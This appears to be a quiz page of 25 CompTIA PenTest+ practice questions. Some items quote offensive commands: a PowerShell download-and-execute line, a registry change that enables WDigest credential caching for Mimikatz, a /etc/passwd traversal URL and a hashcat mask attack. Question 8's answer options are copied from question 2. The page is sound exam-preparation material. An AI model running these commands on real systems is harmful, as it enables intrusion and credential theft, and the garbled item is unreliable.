CompTIA Pentest+ PT0-001 Questions | Practice Test / Quiz / MCQs

Classes | Practice Tests / Quizzes | User Guide | Life Manuals

28.5K quizzes covering K–12, CBSE, SAT, ACT, GRE, UPSC, SSC, Banking, Reasoning & more.

CompTIA Security+ Certification
| Take A Quiz

Home > CompTIA Security+ Certification > Quizzes > CompTIA Pentest+ PT0-001 Questions

CompTIA Pentest+ PT0-001 Questions

Fast practice, instant feedback. Timer auto-submits when time’s up.

Avg score: 27% • Most missed: “Which of the following commands starts the Metasploit database?”

CompTIA PenTest+ certification exam covers all penetration testing stages. The exam includes all aspects of vulnerability management. It not only covers hands-on vulnerability assessment, scanning, and analysis, but also includes planning, scoping, and managing weaknesses, not just exploiting them. PenTest+ covers the latest techniques against expanded attack surfaces. It is a unique exam that requires a candidate to demonstrate the most relevant pen testing skills for the cloud, hybrid environments, web applications, Internet of Things (IoT), and traditional on-premises. The CompTIA... Show more

CompTIA PenTest+ certification exam covers all penetration testing stages. The exam includes all aspects of vulnerability management. It not only covers hands-on vulnerability assessment, scanning, and analysis, but also includes planning, scoping, and managing weaknesses, not just exploiting them.
PenTest+ covers the latest techniques against expanded attack surfaces. It is a unique exam that requires a candidate to demonstrate the most relevant pen testing skills for the cloud, hybrid environments, web applications, Internet of Things (IoT), and traditional on-premises.

The CompTIA PenTest+ certification exam verifies your knowledge and skills required to:

Plan and scope a penetration testing engagement
Understand legal and compliance requirements
Perform vulnerability scanning and penetration testing using appropriate tools and techniques, and then analyze the results
Produce a written report containing proposed remediation techniques, effectively communicate results to the management team, and provide practical recommendations

Show less

CompTIA Pentest+ PT0-001 Questions

Time left 00:00

1. At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

Port scanningEnumeration of servicesSocial engineeringOSINT gathering

2. Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Stack base pointerDestination index registerStack pointer registerIndex pointer register

3. Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

It is difficult for administrators to implement the same security standards across the board.Regulatory authorities often have lower security requirements for IoT systems.IoT systems often lack the hardware power required by more secure solutions.Manufacturers developing IoT devices are less concerned with security.

4. Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1);Invoke-Cmdlet Which of the following BEST describes the actions performed by this command?

Execute a remote script.Set the execution policy.Run an encoded command.Instantiate an object.

5. A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

dsuser -name -account -limit 3dsquery user -inactive 3dsrm -users DN=company.com; OU=hq CN=usersdsquery -o -rdn -limit 21

6. The following command is run on a Linux file system: chmod 4111 /usr/bin/sudo Which of the following issues may be exploited now?

Sticky bitsMisconfigured sudoUnquoted service pathKernel vulnerabilities

7. A penetration tester is performing a code review. Which of the following testing techniques is being performed?

Fuzzing analysisRun-time analysisStatic analysisDynamic analysis

8. During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

Stack pointer registerIndex pointer registerStack base pointerDestination index register

9. A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?

hashcat -m 5600 hash.txthashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txthashcat -m 5600 -o results.text hash.txt wordlist.txthashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

10. A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

Compliance scanVulnerability scanDynamic scanStatic scan

11. Which of the following types of intrusion techniques is the use of an under-the-door tool during a physical security assessment an example of?

LockpickingLock bumpingEgress sensor triggeringLock bypass

12. A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

nmap -p 22 -sL targetsnmap -p 22 -oA targetsnmap -p 22 -iL targetsnmap -p 22 -oG targets

13. A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

An up-to-date list of possible exploitsA list of sample test accountsA list of sample application requestsThe latest vulnerability scan results

14. A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?

Scrape the page for hidden fields.Horizontally escalate privileges.Search for HTTP headers.Analyze HTTP response code.

15. A penetration tester, who is not on the clients network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125 Which of the following commands would be BEST to return results?

nmap -sF -p 100.100.1.0-125nmap -sV -oA output 100.100.10-125nmap -Pn -sT 100.100.1.0-125nmap 100.100.1.0-125 -T4

16. In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

ASLR bypassConfiguration filesSandbox escapeCommon libraries

17. Which of the following tools would a penetration tester leverage to conduct OSINT?.

WiresharkBeEFShodan /MaltegoSET

18. Given the following script: Which of the following BEST describes the purpose of this script?

Debug message collectionLog collectionKeystroke monitoringEvent collection

19. A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

Encrypt the communication channel.Enable a secure cookie flag.Sanitize invalid user input.Enable HTTP Strict Transport Security.

20. A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report?

Randomize local administrator credentials for each machine.Disable remote logons for local administrators.Enable full-disk encryption on every workstation.Require multifactor authentication for all logins. / Increase minimum password complexity requirements. / Apply additional network access control.

21. A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?

Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.

22. Which of the following excerpts would come from a corporate policy?

Employee passwords must contain a minimum of eight characters, with one being alphanumeric.The corporate systems must store passwords using the MD5 hashing algorithm.The help desk can be reached at 800-passwd1 to perform password resets.Employees must use strong passwords for accessing corporate assets.

23. A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.

24. Given the following: http://example.com/download.php?id-…/…/…/etc/passwd Which of the following BEST describes the above attack?

Directory traversal attackInsecure direct object reference attackRedirect attackMalicious file upload attack

25. During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?

reg add HKLMSoftwareCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1reg add HKLMSystemCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1reg add HKCUSystemCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1reg add HKLMSystemControlSet002ControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 0

Welcome to Fatskills

Join 4M+ learners. Unlock unlimited quizzes, wrong-answer tracking, flashcards + reminders, study guides, and 1-on-1 challenges.

Create a free account Sign in

900+ exams • Millions of questions • No spam

❤ If you liked Fatskills, consider supporting us by checking out The Life Manuals You Never Got.

🌈 Our mission is to help improve your scores in any subject and exam withonline quizzes, practice tests, study guides, & advice for students. Since 2018.

About | Explore | User Guide | Topics | Subjects | Doubt Solver | Career Aptitude Test | Answers | Free Tools | What Should We Know?
Privacy | Terms |

All trademarks, logos and brand names are the property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, trademarks and brands does not imply endorsement.

25 Questions

❤ If you liked Fatskills, consider supporting us by checking out The Life Manuals You Never Got.

About | Explore | User Guide | Topics | Subjects | Doubt Solver | Career Aptitude Test | Answers | Free Tools | What Should We Know?
Privacy | Terms |

Without work one finishes nothing. - Ralph Waldo Emerson
© 2026 Fatskills.com

All trademarks, logos and brand names are the property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, trademarks and brands does not imply endorsement.

25 Questions

❤ If you liked Fatskills, consider supporting us by checking out The Life Manuals You Never Got.

About | Explore | User Guide | Topics | Subjects | Doubt Solver | Career Aptitude Test | Answers | Free Tools | What Should We Know? Privacy | Terms |

Without work one finishes nothing. - Ralph Waldo Emerson© 2026 Fatskills.com

All trademarks, logos and brand names are the property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, trademarks and brands does not imply endorsement.

About | Explore | User Guide | Topics | Subjects | Doubt Solver | Career Aptitude Test | Answers | Free Tools | What Should We Know?
Privacy | Terms |

Without work one finishes nothing. - Ralph Waldo Emerson
© 2026 Fatskills.com